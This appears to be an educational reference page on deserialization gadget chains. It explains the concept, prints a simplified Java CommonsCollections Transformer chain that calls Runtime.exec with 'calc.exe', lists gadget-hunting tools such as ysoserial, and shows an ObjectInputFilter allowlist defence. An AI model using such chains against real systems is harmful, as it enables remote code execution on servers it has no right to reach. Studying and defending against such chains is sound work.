Deserialization Gadget Chain

Deserialization Gadget Chain is a technique for exploiting insecure deserialization by chaining together existing code fragments (gadgets) within an application's libraries to achieve malicious effects like remote code execution.

Concept

Rather than injecting new code, gadget chains abuse existing, legitimate code that performs dangerous operations when combined in unexpected ways through deserialization.

Chain Construction

Deserialization triggers the chain:

  ObjectA (deserialized)
      ↓ calls method automatically
  ObjectB.transform()
      ↓ invokes through reflection
  ObjectC.invoke()
      ↓ executes
  Runtime.exec("malicious command")

Each gadget is benign on its own; chained together they yield RCE.

Java Gadget Chain Example

// CommonsCollections chain (simplified)
Transformer[] transformers = {
    new ConstantTransformer(Runtime.class),
    new InvokerTransformer("getMethod",
        new Class[]{String.class, Class[].class},
        new Object[]{"getRuntime", new Class[0]}),
    new InvokerTransformer("invoke",
        new Class[]{Object.class, Object[].class},
        new Object[]{null, new Object[0]}),
    new InvokerTransformer("exec",
        new Class[]{String.class},
        new Object[]{"calc.exe"})
};
Transformer chain = new ChainedTransformer(transformers);
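A defensive counterpart to the chain above, added here as an example and not part of the original page: a JEP 290 ObjectInputFilter allowlist that rejects every class the endpoint does not expect, so a ChainedTransformer or InvokerTransformer descriptor in the stream aborts the read before any gadget is instantiated. It assumes Java 9 or later; the class and method names are hypothetical, and HashMap stands in for a gadget class that is absent from the allowlist.

```java
import java.io.*;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

public class FilteredDeserialization {

    // Allowlist of the only types this endpoint expects. Every other class,
    // including the Transformer gadgets above, matches the trailing "!*" and is
    // rejected when its class descriptor is read, before any constructor,
    // readObject or transform() can run. maxdepth caps graph nesting, which
    // chained gadgets also depend on. An allowlist beats a denylist of known
    // gadget classes, since a denylist misses the next chain.
    private static final ObjectInputFilter ALLOWLIST =
            ObjectInputFilter.Config.createFilter(
                    "java.util.ArrayList;java.lang.String;maxdepth=5;!*");

    // Deserialize untrusted bytes under the allowlist (hypothetical helper).
    public static Object readFiltered(byte[] untrusted) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(untrusted))) {
            in.setObjectInputFilter(ALLOWLIST);
            return in.readObject();
        }
    }

    // Demo helper: serialize any object to bytes.
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Expected payload (constructed): a list of strings, admitted by the allowlist.
        List<String> expected = new ArrayList<>(List.of("alpha", "beta"));
        System.out.println("allowed: " + readFiltered(serialize(expected)));

        // HashMap stands in for a gadget class that is not on the allowlist.
        HashMap<String, String> unexpected = new HashMap<>();
        unexpected.put("k", "v");
        try {
            readFiltered(serialize(unexpected));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same filter can be applied JVM-wide with the jdk.serialFilter system property, which also covers ObjectInputStream instances the application code does not construct itself.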

Finding Gadgets

  • Analyze libraries for dangerous method calls
  • Identify auto-invoked methods (constructors, finalize, magic methods)
  • Trace call paths to dangerous sinks
  • Use tools like ysoserial, PHPGGC, or custom fuzzers
